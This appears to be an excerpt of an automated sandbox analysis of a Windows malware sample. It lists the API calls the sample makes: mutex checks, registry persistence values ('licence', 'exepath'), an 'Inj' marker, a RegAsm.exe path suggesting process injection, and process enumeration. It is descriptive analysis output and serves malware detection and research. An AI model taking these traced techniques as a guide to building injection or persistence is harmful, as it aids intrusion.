                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                    • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                    • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                  • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                  • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                  • OpenMutexA.KERNEL32 ref: 00408E80
                                  • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                  • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                    • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                    • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                    • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                  • wcslen.MSVCRT ref: 004090DB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                    • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                    • Part of subcall function 00407E37: CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                    • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                    • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                  • wcscpy.MSVCRT ref: 00409230
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNEL32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                  • atoi.MSVCRT ref: 00409391
                                  • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                  • atoi.MSVCRT ref: 00409540
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                    • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                    • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                    • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                    • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                    • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
